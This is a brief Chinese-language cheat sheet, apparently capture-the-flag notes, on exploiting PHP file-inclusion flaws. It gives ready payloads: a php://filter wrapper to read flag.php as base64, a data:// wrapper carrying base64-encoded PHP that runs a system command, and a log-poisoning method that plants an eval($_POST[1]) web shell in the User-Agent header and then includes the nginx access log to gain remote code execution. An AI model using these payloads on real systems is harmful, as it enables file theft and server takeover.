宗旨是php伪协议和data伪协议,遇到过滤可以用base64,url编码绕过
?file=php://filter/convert.base64-encode/resource=flag.php
?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs=
PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs ===> <?php system('cat flag.php');
日志包含:
日志文件路径:?file=/var/log/nginx/access.log
修改参数:User Agent :<?= eval($_POST[1]);?>
POST传参即可RCE